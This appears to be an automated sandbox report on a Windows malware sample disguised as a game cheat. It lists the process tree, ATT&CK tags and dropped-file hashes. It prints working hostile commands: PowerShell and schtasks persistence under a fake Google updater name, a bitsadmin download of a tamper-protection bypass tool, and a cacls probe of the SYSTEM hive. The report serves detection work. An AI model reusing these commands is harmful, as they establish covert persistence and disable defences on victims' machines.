"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
6⤵
PID:5864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
6⤵
PID:6052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
6⤵
PID:6028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
6⤵
PID:4500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
6⤵
PID:5008

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
6⤵
PID:4484

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
6⤵
PID:4824

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6f7b05460,0x7ff6f7b05470,0x7ff6f7b05480
7⤵
PID:5476

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,6440808487723189098,13326827473353574550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
6⤵
PID:5912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Roblox Player.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
5⤵
PID:2016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffda5246f8,0x7fffda524708,0x7fffda524718
6⤵
PID:4180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,4097952753808464107,7394578703301852234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
6⤵
PID:5376

C:\Users\Admin\AppData\Roaming\1.exe
"C:\Users\Admin\AppData\Roaming\1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Microsoft Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\1.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gmnga#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
PID:5028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cabjutuff#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
PID:5396

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:880

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe wifbcredad
2⤵
PID:2028

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
PID:6040

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3156

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:6096

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B6C2.tmp\B6C3.tmp\B6C4.bat C:\Users\Admin\AppData\Roaming\FenixCheatPACKAGES.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
2⤵
PID:1736

C:\Windows\system32\wscript.exe
wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
2⤵
PID:768

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
2⤵
- Download via BitsAdmin
PID:1556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1456

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
PID:5604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gmnga#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
PID:2404

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

BITS Jobs

T1197

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

BITS Jobs

T1197

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FenixCheatBETA.exe.log
Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
78c7656527762ed2977adf983a6f4766

SHA1
21a66d2eefcb059371f4972694057e4b1f827ce6

SHA256
e1000099751602ae1adcec6f1c74e1d65f472936817b45239dfed4b043984296

SHA512
0a8e58ae95163b3cdf8e81b5085887761e73cb7c836a1a6a972e837fb3df69b2ac70cfd6311d06d40656344ec35eb48e512f007561480f0345486ac2b329be0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
78c7656527762ed2977adf983a6f4766

SHA1
21a66d2eefcb059371f4972694057e4b1f827ce6

SHA256
e1000099751602ae1adcec6f1c74e1d65f472936817b45239dfed4b043984296

SHA512
0a8e58ae95163b3cdf8e81b5085887761e73cb7c836a1a6a972e837fb3df69b2ac70cfd6311d06d40656344ec35eb48e512f007561480f0345486ac2b329be0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
099b4ba2787e99b696fc61528100f83f

SHA1
06e1f8b7391e1d548e49a1022f6ce6e7aa61f292

SHA256
cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8

SHA512
4309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
099b4ba2787e99b696fc61528100f83f

SHA1
06e1f8b7391e1d548e49a1022f6ce6e7aa61f292

SHA256
cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8

SHA512
4309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
099b4ba2787e99b696fc61528100f83f

SHA1
06e1f8b7391e1d548e49a1022f6ce6e7aa61f292

SHA256
cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8

SHA512
4309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
5dfd03b3dd67c8af2b893955484c8135

SHA1
e3ed2f54df118cdfda354d35f2d5e8106ac68f10

SHA256
2452df28ce2af6022512073064da94fbb8005db6e3fc4d07e6cb66a54397fc40

SHA512
fc8ebc547b165360a0c1204c352069c9fb2225038a4e30b31e4a083a45ad959cd4149c1c65e4935404667c7134d497d1b271136ebf194b1963a1fa8940aae58c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
775bb602b88b718c68a2941ce7eb52fb

SHA1
2b1ab2b8b479f9faba8043d05034b390dd35d4f7

SHA256
b209346085e564e7eb565495e05b2f09883bafdcf2cd8f55c9454ed7997fc0cd

SHA512
27762994a785986f85e5f62e46d7c7d8abbc65c1f4b4afc5f685baef0ae4fee0271f9b37949aa754384d15cdf820469eaa3c06d159e61664fcba5195b9165c00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
066ff0b344b7ba8efbe585f9b682e057

SHA1
5fa77b27dbf1334ffdb510b4a8f23e5a5adf3bd0

SHA256
673159efd599abc3f268ce771c0f54b5e83d4a207d01f52fab39157bb872a702

SHA512
7f030e3211a89e01e562a65320608a40816eda35a7b545889d6e30e25e8a9aa07a41f20e8f8ca63cf347690d3e16d243fea93db193ba27d66d0d05d06c44c87b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
e13c36de1ec906f6572629eaa262e121

SHA1
52a6815c9cf4cf9458790527733ae48631ec38da

SHA256
554bfba7af1a5e49e6a6dad360d185f6fb504ef61a599d50068305a2f5d6b2f6

SHA512
f44b8337a684b09ed66e0f64e9af908f5399907852a2f6e7fe09f5bba27aa3942514bc53773950a02b24aae22ac347fde082d2c4f3c417adcc8d8b58e88abfb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
02ee7addc9e8a2d07af55556ebf0ff5c

SHA1
020161bb64ecb7c6e6886ccc055908984dc651d8

SHA256
552d3ed359b7a52278ce621674d16428d8a7969f6cd5663df18e240cce66aadc

SHA512
567989543c3848a0c3276d96b96ca761f750e4b71fb74f36d809f590ffe16a72fd5ece251737a8b1ffe65f0051e211bd7ad19d2b8b0b7ca1b7ffc86dd2a52883

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
369B

MD5
54c561b460f2fddff93e732b0a824ea1

SHA1
d41fd4ecebc3eede582a7834068d2fd251947c3e

SHA256
742ac7d30965786c76fcd6fdb75ce58547b8f1722c848da742918e7f3d51357a

SHA512
568898ad15e6f6d2b62a690f2f2d7adab55b157f4a77db281e43f6202a548f791875a43d4dc345d918062c60c3b7004374819831b712c7ca87637fc524230089

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe577d1f.TMP
Filesize
371B

MD5
6026e50ce764da00afc97ea3284a733a

SHA1
3ac2fa1213ad61371001feb8793001edffcc89b4

SHA256
aa0efa2068f0b3a36df099609a528e612732876d32a578730cbfa4a42cae1e0d

SHA512
951f73b0c74b8c330558cb1a8fa344fe0ae41ba6b21f47aa6a6f1adc9399ea2765598832e907b9f70ff94caf2b5b4359e6fa1e7ce04542df8739aed3c5b89f31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
64dc19f0a0c26b31c55e9240fe597b31

SHA1
d1ba2e1a2a72bf286014ba881eff7b23e3424333

SHA256
6f5250e7e231cf1b32c320c435c396bef0bc91df3861353362220eeca7d0d8e5

SHA512
e3a6d706c48ebb0048c3f118d33ce9357269e3286625ee94f90f53e3a1ee94cf16c231fcd85748ad8bc3194f19e54c7d812512687b34109a7dc0fece89900268

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
64dc19f0a0c26b31c55e9240fe597b31

SHA1
d1ba2e1a2a72bf286014ba881eff7b23e3424333

SHA256
6f5250e7e231cf1b32c320c435c396bef0bc91df3861353362220eeca7d0d8e5

SHA512
e3a6d706c48ebb0048c3f118d33ce9357269e3286625ee94f90f53e3a1ee94cf16c231fcd85748ad8bc3194f19e54c7d812512687b34109a7dc0fece89900268

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
3KB

MD5
083a11675cfd29868a7b1c0f8ef68ba7

SHA1
d1c802c7c77ce98aba8c6a20f0f59a20676ce0e6

SHA256
06ca4789563192f27b1fd9e83acc405b39c88ee23bccc9fddbe808489e5e1ac1

SHA512
1864b898457422f64ec48944d416c3e0626447e964591609dc45073e7ba3ea14e3f129674df24e004ffb0f5400aafad9ddb36cf1a5c1ee188b315466dfb846ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
de300a86c34f6f7a1ceb2464d017cae3

SHA1
24fa0712c9a71e2ed8c1ddaafecdc77a9b928c9e

SHA256
9df4f768930e0876a1cec76ab676b5c9d02db0965fb1c0d60c1a9f2d52819010

SHA512
f3f5c297354f7d2ce4d2e34722579753b10b58ce79e527eb50a83bd0006b5a5ca9c8d4cb171768d3e6fddde67072df40a9b2efbf598ae6023c578f74fefd903a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
092681e2cd19566b34663d551baf186a

SHA1
177e277dbf50fb20b3d9d1ce7b73e068d440e368

SHA256
9658fc73ef4ad51e7ce29853b91e69388f16d590a448abd33ecd4887e7c744a8

SHA512
b64f3e2515496775d217ae9293b0a819b893ff3a7fe3ac1c76bd733e1ef52b8ebbf033a683d10b50c637fd3f2fe46779c1766bae11998a5d6a339fed516d76ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9f22f4a366f554b9039d83d993c6884c

SHA1
de058f1c374371c27ea54a205956db39624e856b

SHA256
0a1a934e6c4f983cc2a30474d90cf4f03d10b5c9221079a99b6bd47d8147d27a

SHA512
e8d4d5ec3a3fae6d2f9d3986c808c151bd5e321b903921d9cd8b72eea6d5d4b9325d03a45175a99c8f37534703f9d3d8df5e55e08edee1ef802fba0d6bfa3b2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6C2.tmp\B6C3.tmp\B6C4.bat
Filesize
3KB

MD5
b98c87aab10a1fd144da6bae1021ed61

SHA1
46e95d33aae128eaf460871896a9c4ea5d60296b

SHA256
914a07bb1bd8414c2c4e45021fd8175b44cb84d3a88cbc841f0b2df3a3fb512b

SHA512
92eee2680305309721b24341ad6b12e822088a771227585514cae39ec461c653d07804b250ddff827cd00136414f063ba3ae897f9beea08a39bdcea33a1a1344

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6D1.tmp\B6D2.tmp\B6E3.bat
Filesize
3KB

MD5
76e341356371b52b90cb6fc4de9e4c73

SHA1
a422976b20d653418ef731590ee02f003cd2a3f7

SHA256
1f567fc0fed78d5fee2a59ae12ae82abf6b520ce72f4a135b2f89e2bedcdc61c

SHA512
c4a875d540da0596103fae67cd67b8502ea1a09362045d209f98a7ca3d432adc06b7312b2a4c12a2bd5f177a2d70dc0af1453a7a6133bdfc4387f11265229c99

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\VCRUNTIME140.dll
Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\VCRUNTIME140.dll
Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_bz2.pyd
Filesize
47KB

MD5
758fff1d194a7ac7a1e3d98bcf143a44

SHA1
de1c61a8e1fb90666340f8b0a34e4d8bfc56da07

SHA256
f5e913a9f2adf7d599ea9bb105e144ba11699bbcb1514e73edcf7e062354e708

SHA512
468d7c52f14812d5bde1e505c95cb630e22d71282bda05bf66324f31560bfa06095cf60fc0d34877f8b361ccd65a1b61d0fd1f91d52facb0baf8e74f3fed31cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_bz2.pyd
Filesize
47KB

MD5
758fff1d194a7ac7a1e3d98bcf143a44

SHA1
de1c61a8e1fb90666340f8b0a34e4d8bfc56da07

SHA256
f5e913a9f2adf7d599ea9bb105e144ba11699bbcb1514e73edcf7e062354e708

SHA512
468d7c52f14812d5bde1e505c95cb630e22d71282bda05bf66324f31560bfa06095cf60fc0d34877f8b361ccd65a1b61d0fd1f91d52facb0baf8e74f3fed31cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_ctypes.pyd
Filesize
56KB

MD5
6ca9a99c75a0b7b6a22681aa8e5ad77b

SHA1
dd1118b7d77be6bb33b81da65f6b5dc153a4b1e8

SHA256
d39390552c55d8fd4940864905cd4437bc3f8efe7ff3ca220543b2c0efab04f8

SHA512
b0b5f2979747d2f6796d415dd300848f32b4e79ede59827ac447af0f4ea8709b60d6935d09e579299b3bc54b6c0f10972f17f6c0d1759c5388ad5b14689a23fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_ctypes.pyd
Filesize
56KB

MD5
6ca9a99c75a0b7b6a22681aa8e5ad77b

SHA1
dd1118b7d77be6bb33b81da65f6b5dc153a4b1e8

SHA256
d39390552c55d8fd4940864905cd4437bc3f8efe7ff3ca220543b2c0efab04f8

SHA512
b0b5f2979747d2f6796d415dd300848f32b4e79ede59827ac447af0f4ea8709b60d6935d09e579299b3bc54b6c0f10972f17f6c0d1759c5388ad5b14689a23fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_lzma.pyd
Filesize
84KB

MD5
abceeceaeff3798b5b0de412af610f58

SHA1
c3c94c120b5bed8bccf8104d933e96ac6e42ca90

SHA256
216aa4bb6f62dd250fd6d2dcde14709aa82e320b946a21edeec7344ed6c2c62e

SHA512
3e1a2eb86605aa851a0c5153f7be399f6259ecaad86dbcbf12eeae5f985dc2ea2ab25683285e02b787a5b75f7df70b4182ae8f1567946f99ad2ec7b27d4c7955

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_lzma.pyd
Filesize
84KB

MD5
abceeceaeff3798b5b0de412af610f58

SHA1
c3c94c120b5bed8bccf8104d933e96ac6e42ca90

SHA256
216aa4bb6f62dd250fd6d2dcde14709aa82e320b946a21edeec7344ed6c2c62e

SHA512
3e1a2eb86605aa851a0c5153f7be399f6259ecaad86dbcbf12eeae5f985dc2ea2ab25683285e02b787a5b75f7df70b4182ae8f1567946f99ad2ec7b27d4c7955

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_socket.pyd
Filesize
41KB

MD5
afd296823375e106c4b1ac8b39927f8b

SHA1
b05d811e5a5921d5b5cc90b9e4763fd63783587b

SHA256
e423a7c2ce5825dfdd41cfc99c049ff92abfb2aa394c85d0a9a11de7f8673007

SHA512
95e98a24be9e603b2870b787349e2aa7734014ac088c691063e4078e11a04898c9c547d6998224b1b171fc4802039c3078a28c7e81d59f6497f2f9230d8c9369

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21642\_socket.pyd
Filesize
41KB
